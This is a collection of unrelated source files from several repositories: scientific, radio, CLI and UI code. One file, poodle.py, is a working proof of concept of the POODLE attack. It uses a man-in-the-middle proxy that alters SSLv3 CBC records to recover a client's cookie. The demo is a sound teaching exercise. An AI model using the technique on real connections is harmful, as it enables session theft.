dist_direct = dist_acc + get_edge_distance(x,y)
if True:
dist = [dist_direct]
for elem in route_map[x] :
if bike_allowed(x, elem) != -1 and elem not in visited_nodes:
dist.append(get_min_cycle_time(elem, y, dist_acc + get_edge_distance(x, elem), visited_nodes))
else:
continue
return (min(dist) if len(dist) else sys.maxsize)
cycle = get_min_cycle_time(x,y)
bike = get_min_bike_time(x,y)
cycle_time = cycle/float(v1)
bike_time = bike/float(v2)
print '------------------'
print bike, cycle
print bike_time, cycle_time
|
shams-sam/logic-lab
|
DfsShortestPath/dfs_solution.py
|
Python
|
mit
| 2,348 | 0.008518 |
import distribute3Sphere
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
import logging, sys
from sklearn.neighbors import NearestNeighbors
#from scipy.spatial import Delaunay
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)
def get_S2(q):
try:
assert(q.shape[0] > 3)
except AssertionError:
_logger.error('subroutine get_S2: q has wrong dimensions')
_logger.exception('subroutine get_S2: q has wrong diemnsions')
sys.exit(1)
raise
# projection angles
S2 = 2*np.vstack((q[1,:]*q[3,:]-q[0,:]*q[2,:],\
q[0,:]*q[1,:]+q[2,:]*q[3,:], \
q[0,:]**2 + q[3,:]**2-0.5))
"""
From the original matlab code:
S2 = 2*[q(2,:).*q(4,:)-q(1,:).*q(3,:);
q(1,:).*q(2,:)+q(3,:).*q(4,:);
q(1,:).^2+q(4,:).^2-0.5];
"""
return S2
def classS2(X,Q):
nbrs = NearestNeighbors(n_neighbors=1, algorithm='ball_tree').fit(X)
distances, IND = nbrs.kneighbors(Q)
NC = np.bincount(IND[:,0].squeeze())
return (IND,NC)
def op(q,shAngWidth,PDsizeTh,visual,*fig):
nG = np.floor(4*np.pi / (shAngWidth**2)).astype(int)
# reference angles
S20,it = distribute3Sphere.op(nG)
#print S20.shape
S20 = S20.T
#nS = q.shape[1]
# projection angles
S2 = get_S2(q)
IND, NC = classS2(S20.T, S2.T)
NIND = (NC > PDsizeTh).nonzero()[0]
#sys.exit()
S20_th = S20[:,NIND]
CG = []
for i in xrange(len(NIND)):
a = (IND == NIND[i]).nonzero()[0]
CG.append(a)
if visual:
# fig = plt.figure(figsize=(4,4))
ax = Axes3D(fig)
ax.set_xlim3d(-1, 1)
ax.set_ylim3d(-1, 1)
ax.set_zlim3d(-1, 1)
for i in xrange(np.floor(CG.shape[1]) / 2):
a = CG[i]
ax.scatter(S2(1, a[::40]), S2(1, a[::40]), S2(2, a[::40]),marker='o',s=20,alpha=0.6)
return (CG, nG,S20_th)
#if __name__ == '__main__':
# op(ang,df,Shan_width,visual,GCnum,fig,flip=True)
|
hstau/manifold-cryo
|
S2tessellation.py
|
Python
|
gpl-2.0
| 1,976 | 0.039474 |
import time
import unittest
import os
import tempfile
import numpy as np
from urh.util import util
util.set_windows_lib_path()
from urh.dev.native.lib import hackrf
from urh.dev.native.HackRF import HackRF
class TestHackRF(unittest.TestCase):
def callback_fun(self, buffer):
print(buffer)
for i in range(0, len(buffer), 4):
try:
r = np.fromstring(buffer[i:i + 2], dtype=np.float16) / 32767.5
i = np.fromstring(buffer[i + 2:i + 4], dtype=np.float16) / 32767.5
except ValueError:
continue
if r and i:
print(r, i)
# out.append(complex(float(buffer[i:i+1])/32767.5, float(buffer[i+2:i+3])/32767.5))
return 0
def test_fromstring(self):
buffer = b'\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xff\xfd\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xfe\xfd\xfe\xff\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xfe'
r = np.empty(len(buffer) // 2, dtype=np.float32)
i = np.empty(len(buffer) // 2, dtype=np.float32)
c = np.empty(len(buffer) // 2, dtype=np.complex64)
# dtype =
unpacked = np.frombuffer(buffer, dtype=[('r', np.uint8), ('i', np.uint8)])
ru = unpacked['r'] / 128.0
iu = unpacked['i'] / 128.0
# for j in range(0, len(buffer)-1, 2):
# r[j//2] = np.frombuffer(buffer[j:j + 1], dtype=np.int8) / 128.0
# i[j//2] = np.frombuffer(buffer[j + 1:j + 2], dtype=np.int8) / 128.0
# r2 = np.fromstring(buffer[], dtype=np.float16) / 32767.5
c.real = ru
c.imag = iu
print(c)
# x,y = np.frombuffer(buffer, dtype=[('x', np.float16), ('y', np.float16)])
def test_fromstring2(self):
buffer = b'\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xff\xfd\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xfe\xfd\xfe\xff\xfe\xfe\xfe\xfe\xfe\xfe\xfe\xfd\xfe'
c = np.empty(len(buffer) // 2, dtype=np.complex64)
# dtype =
unpacked = np.frombuffer(buffer, dtype="<h") # cast in short
print(unpacked)
f = 1.0/32767.5
for i in range(0, len(unpacked)-1,2):
c[i] = complex(float(unpacked[i]*f), float(unpacked[i+1]*f))
print(c)
# x,y = np.frombuffer(buffer, dtype=[('x', np.float16), ('y', np.float16)])
def test_hackrf_class_recv(self):
hfc = HackRF(433.92e6, 1e6, 1e6, 20)
hfc.start_rx_mode()
i = 0
TIME_TOTAL = 5
while i <TIME_TOTAL:
print("{0}/{1}".format(i+1, TIME_TOTAL))
time.sleep(1)
i+=1
print("{0:,}".format(hfc.current_recv_index))
hfc.received_data.tofile(os.path.join(tempfile.gettempdir(), "hackrf.complex"))
print("Wrote Data")
hfc.stop_rx_mode("Finished test")
def test_hackrf_class_send(self):
hfc = HackRF(433.92e6, 1e6, 1e6, 20)
hfc.start_tx_mode(np.fromfile(os.path.join(tempfile.gettempdir(), "hackrf.complex"),
dtype=np.complex64), repeats=1)
while not hfc.sending_finished:
print("Repeat: {0} Current Sample: {1}/{2}".format(hfc.current_sending_repeat+1,
hfc.current_sent_sample,
len(hfc.samples_to_send)))
time.sleep(1)
hfc.stop_tx_mode("Test finished")
def test_hackrf_pack_unpack(self):
arr = np.array([-128, -128, -0.5, -0.5, -3, -3, 127, 127], dtype=np.int8)
self.assertEqual(arr[0], -128)
self.assertEqual(arr[1], -128)
self.assertEqual(arr[-1], 127)
received = arr.tostring()
self.assertEqual(len(received), len(arr))
self.assertEqual(np.int8(received[0]), -128)
self.assertEqual(np.int8(received[1]), -128)
unpacked = HackRF.unpack_complex(received, len(received) // 2)
self.assertEqual(unpacked[0], complex(-1, -1))
self.assertAlmostEqual(unpacked[1], complex(0, 0), places=1)
self.assertAlmostEqual(unpacked[2], complex(0, 0), places=1)
self.assertEqual(unpacked[3], complex(1, 1))
packed = HackRF.pack_complex(unpacked)
self.assertEqual(received, packed)
def test_c_api(self):
def callback(n):
print("called")
return np.array([1], dtype=np.complex64)
print("init", hackrf.init())
print("open", hackrf.open())
print("start_tx", hackrf.start_tx_mode(callback))
time.sleep(1)
print("stop_tx", hackrf.stop_tx_mode())
print("close", hackrf.close())
print("exit", hackrf.exit())
if __name__ == "__main__":
unittest.main()
|
splotz90/urh
|
tests/HackRFTests.py
|
Python
|
gpl-3.0
| 4,709 | 0.004247 |
# Copyright (c) 2013 Yogesh Panchal, yspanchal@gmail.com
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import logging
import requests
from cliff.command import Command
from .utils import read_creds
class Wikiget(Command):
"""
* Get wiki page created for repository
"""
log = logging.getLogger(__name__ + '.Wikiget')
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
def get_parser(self, prog_name):
parser = super(Wikiget, self).get_parser(prog_name)
parser.add_argument(
'--account',
'-a',
metavar='<account name>',
required=True,
help='Your account name')
parser.add_argument(
'--reponame',
'-r',
metavar='<repo name>',
required=True,
help='The repository name')
parser.add_argument(
'--page',
'-p',
metavar='<page name>',
required=True,
help='The page title')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action({a})'.format(a=parsed_args))
url = ("https://bitbucket.org/api/1.0/"
"repositories/{a.account}/{a.reponame}/"
"wiki/{a.page}/").format(a=parsed_args)
user, passwd = read_creds()
r = requests.get(url, auth=(user, passwd))
if r.status_code == 200:
data = json.loads(r.text)
msg = """
Markup: {d[markup]}
Revision: {d[rev]}
Page Content: {d[data]}
"""
print(msg.format(d=data))
else:
print("\n Error: '404' No Wiki Pages Found"
" 'or' Invalid argument supplied.\n")
sys.exit(1)
class Wikipost(Command):
"""
* Post new wiki page for repositorys
"""
log = logging.getLogger(__name__ + '.Wikipost')
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
def get_parser(self, prog_name):
parser = super(Wikipost, self).get_parser(prog_name)
parser.add_argument(
'--account',
'-a',
metavar='<account name>',
required=True,
help='Your account name')
parser.add_argument(
'--reponame',
'-r',
metavar='<repo name>',
required=True,
help='The repository name')
parser.add_argument(
'--page',
'-p',
metavar='<page name>',
required=True,
help='The page title')
parser.add_argument(
'--content',
'-c',
metavar='<page content>',
required=True,
help='The page content')
return parser
def take_action(self, parsed_args):
self.log.debug('take_action({a}s)'.format(a=parsed_args))
args = {}
args['content'] = parsed_args.content
url = ("https://bitbucket.org/api/1.0/"
"repositories/{a.account}/{a.reponame}/"
"wiki/{a.page}/").format(a=parsed_args)
user, passwd = read_creds()
r = requests.post(url, data=args, auth=(user, passwd))
print(r.text)
if r.status_code == 200:
print("\n Wiki Page Created Successfully.\n")
else:
msg = ("\n Error: '{r.status_code}' "
"Something Went Wrong -- Bitbucket.\n")
print(msg.format(r=r))
sys.exit(1)
|
yspanchal/bitbucketcli
|
bitbucket/wiki.py
|
Python
|
apache-2.0
| 4,056 | 0.000247 |
"""
Functions:
primer3
primer3_core
parse
"""
import sys
def primer3(sequence, **params):
# See primer3_core for more options.
# Return list of (left_primer, right_primer, product_size)
from StringIO import StringIO
handle = StringIO()
primer3_core(sequence, outhandle=handle, **params)
handle.seek(0)
#print handle.read(); sys.exit(0)
return parse(handle)
def primer3_core(
sequence, product_size=None, num_return=None, target=None,
format_output=None, primer3_core_app=None, outhandle=None, **params):
# product_size (75, 100) or [(100,125),(150,300)] default 100-300
# num_return 5 default 5
# target (25, 50) target base 25 (1-based), length 50
import subprocess
import config
primer3_core_app = primer3_core_app or config.primer3
outhandle = outhandle or sys.stdout
# Set the parameters to the webpage defaults.
#
# Can reproduce results on web site if we set on the website:
# Targets
# Product Size Ranges
#
# Default Product Size Range for web is:
# 150-250 100-300 301-400 401-500 501-600 601-700 701-850 851-1000
defaults = {
"PRIMER_MAX_END_STABILITY" : 9.0,
"PRIMER_MAX_TEMPLATE_MISPRIMING" : 12.00,
"PRIMER_PAIR_MAX_TEMPLATE_MISPRIMING" : 24.00,
"PRIMER_LIBERAL_BASE" : 1,
"PRIMER_LIB_AMBIGUITY_CODES_CONSENSUS" : 0,
"PRIMER_QUALITY_RANGE_MAX" : 100,
#"PRIMER_PAIR_WT_IO_PENALTY" : 1.0,
}
for name, value in defaults.iteritems():
params[name] = params.get(name, value)
cmd = [primer3_core_app]
if format_output:
cmd.append("-format_output")
cmd.append("-strict_tags")
cmd = " ".join(cmd)
p = subprocess.Popen(
cmd, shell=True, bufsize=0, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
w, r = p.stdin, p.stdout
w.write("SEQUENCE_ID=test\n")
#w.write("SEQUENCE=%s\n" % sequence) # obsolete
w.write("SEQUENCE_TEMPLATE=%s\n" % sequence)
if target is not None:
assert len(target) == 2
base, length = target
assert base-1+length <= len(sequence)
w.write("SEQUENCE_TARGET=%d,%d\n" % (base, length))
if product_size:
# Figure out if it's a tuple or a list of tuples.
if type(product_size[0]) is type(0):
assert len(product_size) == 2
product_size = [product_size]
for x in product_size:
assert len(x) == 2
# Format the product size.
# space separated listed of <x>-<y>
sizes = ["%d-%d" % x for x in product_size]
x = " ".join(sizes)
w.write("PRIMER_PRODUCT_SIZE_RANGE=%s\n" % x)
if num_return is not None:
assert num_return >= 1
w.write("PRIMER_NUM_RETURN=%d\n" % num_return)
for name, value in params.iteritems():
w.write("%s=%s\n" % (name, value))
w.write("=\n")
w.close()
for line in r:
outhandle.write(line)
class PrimerInfo:
# o pos is 0-based.
# o The right primer is 5' to 3' for the primer. Need to revcomp
# to compare against the original sequence.
# o The position of right primer is relative to the 5' end of the
# primer (3' end of the sequence). To get the position of the
# primer on a 0-based sequence, do:
# pos - length + 1
def __init__(self, seq, pos, length, tm, gc_percent):
self.seq = seq
self.pos = pos
self.length = length
self.tm = tm
self.gc_percent = gc_percent
def _parse_h(handle):
# Yield: None or <num>, key, value
import re
for line in handle:
assert not line.startswith("Unrecognized"), line.rstrip()
assert "=" in line, line.strip()
key, value = line.split("=", 1)
key, value = key.strip(), value.strip()
if not key and not value:
break
primer_id = None
m = re.search(r"_(\d+)", key)
if m:
primer_id = int(m.group(1))
yield primer_id, key, value
def parse(handle):
# Return list of (left (PrimerInfo), right (PrimerInfo), product_size).
import re
# Which input parameters to ignore.
#input_keys = [
# "SEQUENCE", "PRIMER_PRODUCT_SIZE_RANGE", "PRIMER_NUM_RETURN"]
def data2obj(data, whichone):
#print "START"
#for k in data.keys():
# print k
#print "END"
seq = data["PRIMER_%s_SEQUENCE" % whichone]
x = data["PRIMER_%s" % whichone]
x, y = x.split(",")
pos = int(x)
length = int(y)
tm = float(data["PRIMER_%s_TM" % whichone])
gc_percent = float(data["PRIMER_%s_GC_PERCENT" % whichone])
return PrimerInfo(seq, pos, length, tm, gc_percent)
primers = []
PRODUCT_SIZE = "PRIMER_PAIR_PRODUCT_SIZE"
data = {} # key -> value
prev_primer_id = None
for primer_id, key, value in _parse_h(handle):
if primer_id != prev_primer_id:
if prev_primer_id is not None:
left_primer = data2obj(data, "LEFT")
right_primer = data2obj(data, "RIGHT")
product_size = int(data.get(PRODUCT_SIZE, 0))
x = left_primer, right_primer, product_size
primers.append(x)
data = {}
prev_primer_id = primer_id
# PRIMER_PAIR_1_PENALTY -> PRIMER_PAIR_PENALTY
# PRIMER_LEFT_1 -> PRIMER_LEFT
key = re.sub(r"_\d+", "", key)
data[key] = value
if primer_id is not None:
left_primer = data2obj(data, "LEFT")
right_primer = data2obj(data, "RIGHT")
product_size = int(data.get(PRODUCT_SIZE, 0))
x = left_primer, right_primer, product_size
primers.append(x)
return primers
|
jefftc/changlab
|
genomicode/primer3.py
|
Python
|
mit
| 5,865 | 0.004774 |
from temboo.Library.Nexmo.Voice.CaptureTextToSpeechPrompt import CaptureTextToSpeechPrompt, CaptureTextToSpeechPromptInputSet, CaptureTextToSpeechPromptResultSet, CaptureTextToSpeechPromptChoreographyExecution
from temboo.Library.Nexmo.Voice.ConfirmTextToSpeechPrompt import ConfirmTextToSpeechPrompt, ConfirmTextToSpeechPromptInputSet, ConfirmTextToSpeechPromptResultSet, ConfirmTextToSpeechPromptChoreographyExecution
from temboo.Library.Nexmo.Voice.TextToSpeech import TextToSpeech, TextToSpeechInputSet, TextToSpeechResultSet, TextToSpeechChoreographyExecution
|
jordanemedlock/psychtruths
|
temboo/core/Library/Nexmo/Voice/__init__.py
|
Python
|
apache-2.0
| 565 | 0.00531 |
from __future__ import unicode_literals
from django.contrib.auth.models import AnonymousUser
from django.db.models import Q
from haystack import indexes
from reviewboard.reviews.models import ReviewRequest
from reviewboard.search.indexes import BaseSearchIndex
class ReviewRequestIndex(BaseSearchIndex, indexes.Indexable):
"""A Haystack search index for Review Requests."""
model = ReviewRequest
local_site_attr = 'local_site_id'
# We shouldn't use 'id' as a field name because it's by default reserved
# for Haystack. Hiding it will cause duplicates when updating the index.
review_request_id = indexes.IntegerField(model_attr='display_id')
summary = indexes.CharField(model_attr='summary')
description = indexes.CharField(model_attr='description')
testing_done = indexes.CharField(model_attr='testing_done')
commit_id = indexes.EdgeNgramField(model_attr='commit', null=True)
bug = indexes.CharField(model_attr='bugs_closed')
username = indexes.CharField(model_attr='submitter__username')
author = indexes.CharField()
last_updated = indexes.DateTimeField(model_attr='last_updated')
url = indexes.CharField(model_attr='get_absolute_url')
file = indexes.CharField()
# These fields all contain information needed to perform queries about
# whether a review request is accessible by a given user.
private = indexes.BooleanField()
private_repository_id = indexes.IntegerField()
private_target_groups = indexes.MultiValueField()
target_users = indexes.MultiValueField()
def get_model(self):
"""Returns the Django model for this index."""
return ReviewRequest
def get_updated_field(self):
return 'last_updated'
def index_queryset(self, using=None):
"""Index only public pending and submitted review requests."""
return (
self.get_model().objects
.public(status=None,
show_all_local_sites=True,
show_inactive=True,
filter_private=False)
.select_related('diffset_history',
'local_site',
'repository',
'submitter',
'submitter__profile')
.prefetch_related('diffset_history__diffsets__files',
'target_groups',
'target_people')
)
def prepare_file(self, obj):
return set([
(filediff.source_file, filediff.dest_file)
for diffset in obj.diffset_history.diffsets.all()
for filediff in diffset.files.all()
])
def prepare_private(self, review_request):
"""Prepare the private flag for the index.
This will be set to true if the review request isn't generally
accessible to users.
"""
return not review_request.is_accessible_by(AnonymousUser(),
silent=True)
def prepare_private_repository_id(self, review_request):
"""Prepare the private repository ID, if any, for the index.
If there's no repository, or it's public, 0 will be returned instead.
"""
if review_request.repository and not review_request.repository.public:
return review_request.repository_id
else:
return 0
def prepare_private_target_groups(self, review_request):
"""Prepare the list of invite-only target groups for the index.
If there aren't any invite-only groups associated, ``[0]`` will be
returned. This allows queries to be performed that check that none
of the groups are private, since we can't query against empty lists.
"""
return [
group.pk
for group in review_request.target_groups.all()
if group.invite_only
] or [0]
def prepare_target_users(self, review_request):
"""Prepare the list of target users for the index.
If there aren't any target users, ``[0]`` will be returned. This
allows queries to be performed that check that there aren't any
users in the list, since we can't query against empty lists.
"""
return [
user.pk
for user in review_request.target_people.all()
] or [0]
def prepare_author(self, review_request):
"""Prepare the author field.
Args:
review_request (reviewboard.reviews.models.review_request.
ReviewRequest):
The review request being indexed.
Returns:
unicode:
Either the author's full name (if their profile is public) or an
empty string.
"""
user = review_request.submitter
profile = user.get_profile(cached_only=True)
if profile is None or profile.is_private:
return ''
return user.get_full_name()
|
chipx86/reviewboard
|
reviewboard/reviews/search_indexes.py
|
Python
|
mit
| 5,009 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Poodle implementation with a client <--> proxy <--> server
'''
import argparse
import random
import re
import select
import socket
import SocketServer
import ssl
import string
import sys
import struct
import threading
import time
from utils.color import draw
from pprint import pprint
from struct import *
class SecureTCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
self.request = ssl.wrap_socket(self.request, keyfile="cert/localhost.pem", certfile="cert/localhost.pem", server_side=True, ssl_version=ssl.PROTOCOL_SSLv3)
#loop to avoid broken pipe
while True:
try:
data = self.request.recv(1024)
if data == '':
break
self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server, serving on his host and port waiting the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server
Informe the attacker about the client's frames or the server's response
Finally redirect the data from the client to the server and inversely
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str(self.frame)
return self.frame
def set_decipherable(self, status):
self.decipherable = status
return
def set_length_frame(self, data):
self.frame = data
self.length_frame = len(data)
def client_connection(self):
self.client.connection()
return
def send_request_from_the_client(self, path=0, data=0):
self.client.request(path,data)
return
def client_disconect(self):
self.client.disconnect()
return
if __name__ == '__main__':
plan = """\
+-----------------+ +------------+ +-----------+
| +-------> | +--------> | |
| Client | | Proxy | | Server |
| | <-------+ | <--------+ |
+-----------------+ +---+---+----+ +-----------+
| |
^ | |
| +-----v---+------+
| | |
--+----------+ Attacker |
inject javascript | |
+----------------+
"""
parser = argparse.ArgumentParser(description='Connection with SSLv3')
parser.add_argument('host', help='hostname or IP address')
parser.add_argument('port', type=int, help='TCP port number')
parser.add_argument('-v', help='debug mode', action="store_true")
args = parser.parse_args()
print plan + "\n"
server = Server(args.host, args.port)
client = Client(args.host, args.port+1)
spy = Proxy(args.host, args.port+1)
poodle = Poodle(client)
server.connection()
spy.connection()
poodle.run()
spy.disconnect()
server.disconnect()
|
rtbn/TER_Project
|
poodle-PoC/poodle.py
|
Python
|
gpl-2.0
| 12,158 | 0.005511 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/yc/code/calibre/calibre/src/calibre/gui2/wizard/library.ui'
#
# Created: Thu Oct 25 16:54:55 2012
# by: PyQt4 UI code generator 4.8.5
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_WizardPage(object):
def setupUi(self, WizardPage):
WizardPage.setObjectName(_fromUtf8("WizardPage"))
WizardPage.resize(481, 300)
WizardPage.setWindowTitle(_("WizardPage"))
WizardPage.setTitle(_("Welcome to calibre"))
WizardPage.setSubTitle(_("The one stop solution to all your e-book needs."))
self.gridLayout = QtGui.QGridLayout(WizardPage)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label_3 = QtGui.QLabel(WizardPage)
self.label_3.setText(_("Choose your &language:"))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1)
self.language = QtGui.QComboBox(WizardPage)
self.language.setObjectName(_fromUtf8("language"))
self.gridLayout.addWidget(self.language, 0, 1, 1, 2)
self.libloc_label1 = QtGui.QLabel(WizardPage)
self.libloc_label1.setText(_("<p>Choose a location for your books. When you add books to calibre, they will be copied here. Use an <b>empty folder</b> for a new calibre library:"))
self.libloc_label1.setWordWrap(True)
self.libloc_label1.setObjectName(_fromUtf8("libloc_label1"))
self.gridLayout.addWidget(self.libloc_label1, 2, 0, 1, 3)
self.location = QtGui.QLineEdit(WizardPage)
self.location.setReadOnly(True)
self.location.setObjectName(_fromUtf8("location"))
self.gridLayout.addWidget(self.location, 3, 0, 1, 2)
self.button_change = QtGui.QPushButton(WizardPage)
self.button_change.setText(_("&Change"))
self.button_change.setObjectName(_fromUtf8("button_change"))
self.gridLayout.addWidget(self.button_change, 3, 2, 1, 1)
self.libloc_label2 = QtGui.QLabel(WizardPage)
self.libloc_label2.setText(_("If you have an existing calibre library, it will be copied to the new location. If a calibre library already exists at the new location, calibre will switch to using it."))
self.libloc_label2.setWordWrap(True)
self.libloc_label2.setObjectName(_fromUtf8("libloc_label2"))
self.gridLayout.addWidget(self.libloc_label2, 4, 0, 1, 3)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 1, 0, 1, 1)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem1, 5, 0, 1, 1)
self.label_3.setBuddy(self.language)
self.retranslateUi(WizardPage)
QtCore.QMetaObject.connectSlotsByName(WizardPage)
def retranslateUi(self, WizardPage):
pass
|
yeyanchao/calibre
|
src/calibre/gui2/wizard/library_ui.py
|
Python
|
gpl-3.0
| 3,115 | 0.002889 |
import os
import unittest
from math import pi
import numpy
from kiva import agg
def save_path(filename):
return filename
def draw_arcs(gc, x2, y2, radiusstep=25.0):
gc.set_stroke_color((0.2,0.2,0.2)) # lightgray
gc.move_to(0, 0)
gc.line_to(100, 0)
gc.line_to(x2, y2)
gc.stroke_path()
gc.set_stroke_color((0,0,0))
for i in range(7):
gc.move_to(0, 0);
gc.arc_to(100, 0, x2, y2, i*radiusstep+20.0)
gc.stroke_path()
class TestAffineMatrix(unittest.TestCase):
def test_arc_to(self):
gc = agg.GraphicsContextArray((640,480), "rgba32")
axes = agg.CompiledPath()
axes.move_to(0.5, 50.5)
axes.line_to(100.5, 50.5)
axes.move_to(50.5, 0.5)
axes.line_to(50.5, 100.5)
box = agg.CompiledPath()
box.move_to(0.5, 0.5)
box.line_to(100.5, 0.5)
box.line_to(100.5, 100.5)
box.line_to(0.5, 100.5)
box.close_path()
arc = agg.CompiledPath()
arc.move_to(10, 10)
arc.line_to(20, 10)
arc.arc_to(40, 10, 40, 30, 20.0)
arc.line_to(40, 40)
